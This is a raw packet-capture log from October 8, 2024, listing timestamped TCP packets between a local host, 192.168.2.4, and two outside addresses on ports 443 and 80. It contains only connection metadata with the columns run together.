                                                                                                                Oct 8, 2024 05:00:06.631124973 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.445456028 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.445566893 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.446084976 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.446093082 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:07.449415922 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:07.449425936 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126091957 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126178980 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126200914 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126254082 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126260042 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126303911 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.126323938 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.126379967 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.127089977 CEST49822443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.127103090 CEST4434982249.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.695935011 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696028948 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:08.696309090 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696722031 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:08.696793079 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.361290932 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.361393929 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.361875057 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.361901999 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364181995 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364195108 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364352942 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364383936 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364514112 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364553928 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.364700079 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.364912987 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365119934 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365159035 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365159035 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365179062 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:09.365227938 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:09.365241051 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694396973 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694556952 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.694684029 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.694835901 CEST49835443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.694875002 CEST4434983549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.698497057 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698537111 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:10.698616028 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698833942 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:10.698849916 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.344247103 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.344325066 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.344630003 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.344641924 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:11.345999002 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:11.346004963 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076208115 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076309919 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076327085 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076371908 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076374054 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.076426983 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076556921 CEST49847443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:12.076570034 CEST4434984749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.078641891 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.083444118 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.083513975 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.083702087 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:12.088577986 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784432888 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784471035 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784503937 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784535885 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784568071 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784599066 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784631014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:12.784662962 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171078920 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171111107 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171147108 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171176910 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171188116 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171207905 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171217918 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171238899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171248913 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171269894 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171281099 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171302080 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171312094 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171334982 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171344042 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171365023 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171374083 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171405077 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171416998 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171458960 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171691895 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171725988 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171740055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171766996 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171772957 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171803951 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171814919 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171837091 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171845913 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171869040 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.171876907 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171910048 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.171983957 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172025919 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172097921 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172127962 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172148943 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172163010 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172168016 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172203064 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172209024 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172240019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172250032 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172270060 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172281027 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172302008 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172308922 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172332048 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172342062 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172363997 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172375917 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172394037 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172404051 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172425985 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172432899 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172456980 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172466993 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172489882 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172497034 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172517061 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.172529936 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.172558069 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.174851894 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.174882889 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.174902916 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.174913883 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175003052 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175034046 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175076008 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175076008 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175082922 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175113916 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175115108 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175136089 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175144911 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175156116 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175177097 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175190926 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175209045 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175223112 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175240040 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175255060 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175271988 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175286055 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175303936 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175317049 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175335884 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175348997 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175368071 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175381899 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175412893 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175421000 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175452948 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175467014 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175484896 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175498009 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175529957 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175852060 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175883055 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175903082 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175915956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175926924 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175946951 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175961018 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.175978899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.175987959 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.176026106 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.255341053 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255358934 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255373955 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255398035 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.255435944 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.255599022 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256517887 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256541014 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256556034 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256568909 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256596088 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256598949 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256613970 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256628990 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256639957 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256664991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256738901 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256794930 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256808996 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256835938 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256850004 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.256942034 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256954908 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256968021 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256989956 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.256990910 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257004023 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257006884 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257018089 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257030964 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257035017 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257045031 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257061958 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257065058 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257077932 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257091045 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257091999 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257107019 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.257112980 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257132053 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.257155895 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.298950911 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.298985958 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299019098 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299132109 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.299146891 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345380068 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345405102 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345436096 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345454931 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345468998 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345478058 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345495939 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345520020 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345525980 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345535994 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345557928 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345572948 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345590115 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345604897 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345622063 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345635891 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345654964 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.345669985 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.345700979 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385723114 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385765076 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385780096 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385793924 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385809898 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385818005 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385824919 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385840893 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385852098 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385854959 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385867119 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385891914 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385905027 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385929108 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385941982 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385945082 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385958910 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385966063 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385977983 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385982990 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.385993004 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.385998011 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386014938 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386018991 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386028051 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386030912 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386050940 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386061907 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386073112 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386087894 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386101961 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386123896 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386147976 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386187077 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386200905 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386215925 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386231899 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386240005 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386265039 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386285067 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386315107 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386329889 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386344910 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386352062 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386368036 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386368036 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386379004 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386384010 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386398077 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386413097 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386419058 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386431932 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386442900 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386447906 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386464119 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386471987 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386482954 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386487007 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386497021 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386518955 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386527061 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386531115 CEST4985780192.168.2.4185.215.113.117
                                                                                                                Oct 8, 2024 05:00:13.386540890 CEST8049857185.215.113.117192.168.2.4
                                                                                                                Oct 8, 2024 05:00:13.386555910 CEST8049857185.215.113.117192.168.2.4
